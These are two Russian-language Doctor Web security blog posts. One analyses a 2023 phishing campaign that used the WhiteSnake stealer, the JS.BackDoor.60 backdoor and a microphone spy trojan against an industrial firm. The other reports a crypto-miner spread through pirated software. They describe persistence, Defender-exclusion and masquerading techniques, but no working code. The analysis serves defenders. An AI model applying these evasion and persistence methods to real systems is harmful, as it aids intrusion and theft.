В октябре 2023 года в компанию «Доктор Веб» обратилось российское предприятие машиностроительного сектора с подозрением на присутствие ВПО на одном из своих компьютеров. Наши специалисты расследовали этот инцидент и установили, что пострадавшая компания столкнулась с целевой атакой. В ходе ее проведения злоумышленники рассылали по электронной почте фишинговые сообщения с прикрепленной вредоносной программой, отвечающей за первоначальное заражение системы и установку в нее других вредоносных инструментов.

Целью этой атаки был сбор чувствительной информации о сотрудниках, получение данных об инфраструктуре компании и ее внутренней сети. Кроме того, мы зафиксировали факт выгрузки данных с зараженного компьютера ― как в виде хранившихся на компьютере файлов, так и в виде снимков экрана, созданных во время работы ВПО.

Общие сведения об атаке и используемые инструменты

В начале октября 2023 года злоумышленники отправили на электронный адрес пострадавшей компании несколько фишинговых писем с темой «расследования» неких уголовных дел по уклонению от уплаты налогов. Письма отправлялись якобы от имени следователя Следственного Комитета Российской Федерации и содержали два вложения. Первым был защищенный паролем zip-архив. Он скрывал в себе вредоносную программу, при запуске которой начиналось заражение системы. Вторым был pdf-документ, который не являлся вредоносным. Он содержал фишинговый текст о том, что вся информация об «уголовном деле» находится в архиве, и побуждал открыть вредоносную программу из него.

Самое первое фишинговое письмо содержало архив Трeбoвaниe 19098 Cлед ком РФ от 02.10.23 ПАРОЛЬ - 123123123.zip. В свою очередь, расположенная в нем троянская программа скрывалась в файле Перечень юридических лиц и предприятий, уклонение от уплаты налогов, требования и дополнительные.exe.

Одним из последних отправленных сообщений стало следующее:

К нему был прикреплен фишинговый pdf-документ Требование следователя, уклонение от уплаты налогов (запрос в рамках УД).pdf и zip-архив Трeбoвaниe 19221 СК РФ от 11.10.2023 ПАРОЛЬ - 123123123.zip с таким содержимым:

Как и в более ранних сообщениях, пароль для извлечения файлов из архива атакующие указали и в его названии, и в имени документа Пароль для открытия 123123123.odt. Сам этот документ, как и файлы Права и обязанности и процедура ст. 164, 170, 183 УПК РФ.pdf и СК РФ.png, не являлись вредоносными.

В этом архиве находилось две копии вредоносной программы: Перечень предприятий, уклонение от уплаты налогов, а также дополнительные материалы.exe и Дополнительные материалы, перечень вопросов, накладные и первичные документы.exe.

Во всех случаях распространяемым злоумышленниками вредоносным приложением был Trojan.Siggen21.39882. Эта вредоносная программа, известная как WhiteSnake Stealer, продается в теневом сегменте интернета (Даркнете) и используется для кражи учетных записей от различного ПО, а также других данных. Кроме того, она может загружать и устанавливать на атакуемые компьютеры другие вредоносные приложения. В рассматриваемой целевой атаке ей отводилась роль первой ступени заражения. Получив соответствующие команды, вредоносная программа собрала и передала злоумышленникам информацию о конфигурации профилей Wi-Fi-сетей инфицированной системы, а также пароли доступа к ним. Затем она запустила SSH-прокси-сервер и установила в систему вторую ступень.

Второй ступенью и одновременно главным инструментом злоумышленников стала вредоносная программа-бэкдор JS.BackDoor.60 ― через нее проходило основное взаимодействие между атакующими и зараженным компьютером. Одной из особенностей бэкдора является то, что он использует собственный фреймворк на языке JavaScript. Троян состоит из основного обфусцированного тела, а также вспомогательных модулей, которые благодаря специфике архитектуры вредоносной программы одновременно являются и ее частью, и задачами, которые та исполняет через общие с ними JavaScript-функции. Новые задачи поступают трояну с управляющего сервера и фактически превращают его в многокомпонентную угрозу с расширяемой функциональностью, что позволяет применять его в качестве мощного инструмента кибершпионажа.

Интересен и механизм, с помощью которого JS.BackDoor.60 обеспечивал возможность своего автозапуска. Наряду с одним из традиционных способов ― внесением необходимых изменений в реестр Windows ― троян особым образом модифицировал файлы ярлыков (.lnk). Для этого он проверял содержимое ряда системных каталогов, включая каталог рабочего стола и панели задач, и всем найденным в них ярлыкам, кроме Explorer.lnk или Проводник.lnk, целевым приложением для запуска назначал wscript.exe. При этом для его запуска указывались специальные аргументы, одним из которых был альтернативный поток данных (ADS), в который записывалось тело бэкдора. В результате изменений модифицированные ярлыки вначале запускали JS.BackDoor.60, а уже после ― исходные программы.

На протяжении всей атаки злоумышленники активно направляли бэкдору различные команды и с его помощью похитили с зараженного компьютера содержимое десятков каталогов, которые содержали как личные, так и корпоративные данные. Кроме того, мы зафиксировали факт создания трояном снимков экрана (скриншотов).

Дополнительным инструментом слежки в рассматриваемой атаке стала вредоносная программа BackDoor.SpyBotNET.79, которая использовалась для аудиопрослушивания и записи разговоров через подключенный к зараженному компьютеру микрофон. Этот троян записывал аудио только в том случае, если фиксировал определенную интенсивность звука ― в частности, характерную для голоса.

При этом атакующие пытались также заразить систему трояном-загрузчиком Trojan.DownLoader46.24755, однако из-за возникшей ошибки сделать это им не удалось.

Хронология атаки представлена на следующей схеме:

Хронология получения задач трояном JS.BackDoor.60:

Проведенный нашими специалистами анализ не показал однозначную причастность к данной атаке какой-либо из ранее известных APT-группировок.

Подробнее о Trojan.Siggen21.39882

Подробнее о JS.BackDoor.60

Подробнее о BackDoor.SpyBotNET.79

Подробнее о Trojan.DownLoader46.24755

Заключение

Использование вредоносных инструментов, которые доступны в качестве услуги на коммерческой основе (MaaS ― Malware as a Service), таких как Trojan.Siggen21.39882, позволяет даже относительно неопытным злоумышленникам совершать весьма чувствительные атаки как на бизнес, так и на государственные структуры. В свою очередь, социальная инженерия по-прежнему представляет серьезную угрозу. Это относительно простой, но эффективный способ обойти выстроенную защиту, который могут использовать как опытные, так и начинающие киберпреступники. В связи с этим особенно важно обеспечивать защиту всей инфраструктуры предприятий, в том числе рабочих станций и шлюзов электронной почты. Кроме того, рекомендуется проводить периодический инструктаж сотрудников по теме информационной безопасности и знакомить их с актуальными цифровыми угрозами. Все эти меры помогут снизить вероятность возникновения киберинцидентов, а также минимизировать ущерб от атак.

Индикаторы компрометации

Скрытый майнер в пиратском ПО позволяет злоумышленникам обогащаться за счет своих жертв

Mon, 15 Jan 2024 03:00:00 GMT

15 января 2024 года

Компания «Доктор Веб» сообщает об участившихся случаях выявления троянов-майнеров для скрытой добычи криптовалюты в составе пиратского ПО, доступного в Telegram и на некоторых интернет-площадках.

В декабре 2023 года сотрудники вирусной лаборатории «Доктор Веб» отметили рост числа детектирований трояна-майнера Trojan.BtcMine.3767 и связанного с ним Trojan.BtcMine.2742, которые, как выяснилось, попадали на компьютеры пользователей с пиратскими дистрибутивами различного программного обеспечения.

Trojan.BtcMine.3767 представляет собой троянскую программу для ОС Windows, написанную на языке С++. Это загрузчик майнера, созданный на базе проекта SilentCryptoMiner с открытым кодом. Основными источниками инфицированного данным трояном ПО являются Telegram канал t[.]me/files_f (более 5000 подписчиков), а также сайты itmen[.]software и soft[.]sibnet[.]ru. Отметим, что для последнего подготавливались отдельные сборки с использованием установщика NSIS. При этом после распаковки инсталляционного пакета были обнаружены пути, которые злоумышленники использовали для хранения исходных файлов трояна:

C:\bot_sibnet\Resources\softportal\exe\
C:\bot_sibnet\Resources\protect_build\miner\

По данным вирусной лаборатории «Доктор Веб», за полтора месяца одна из кампаний по распространению данного трояна привела к заражению более 40 000 компьютеров. Однако, учитывая статистику просмотров публикаций в Telegram-канале и трафик сайтов, масштаб проблемы может оказаться ещё более значительным.

После запуска загрузчик копирует себя в каталог %ProgramFiles%\google\chrome\ под именем updater.exe и создает задачу планировщика для обеспечения автозагрузки при запуске ОС. В целях маскировки задача имеет название GoogleUpdateTaskMachineQC. Кроме того, загрузчик прописывает свой файл в исключения антивируса Windows Defender, а также запрещает компьютеру выключаться и уходить в режим гибернации. Начальные настройки зашиты в тело трояна, в дальнейшем получение настроек выполняется с удаленного хоста. После инициализации в процесс explorer.exe внедряется полезная нагрузка — Trojan.BtcMine.2742, троян, отвечающий за скрытую добычу криптовалюты.

Дополнительно загрузчик позволяет устанавливать на скомпрометированный компьютер бесфайловый руткит r77, запрещать обновления ОС Windows, блокировать доступ к сайтам, автоматически удалять и восстанавливать свои исходные файлы, приостанавливать процесс добычи криптовалюты, а также выгружать занимаемую майнером оперативную и видеопамять при запуске на зараженном компьютере программ для мониторинга процессов.

Антивирус Dr.Web успешно обнаруживает и нейтрализует трояны Trojan.BtcMine.3767 и Trojan.BtcMine.2742, поэтому для наших пользователей они не представляют какой-либо угрозы.

Индикаторы компрометации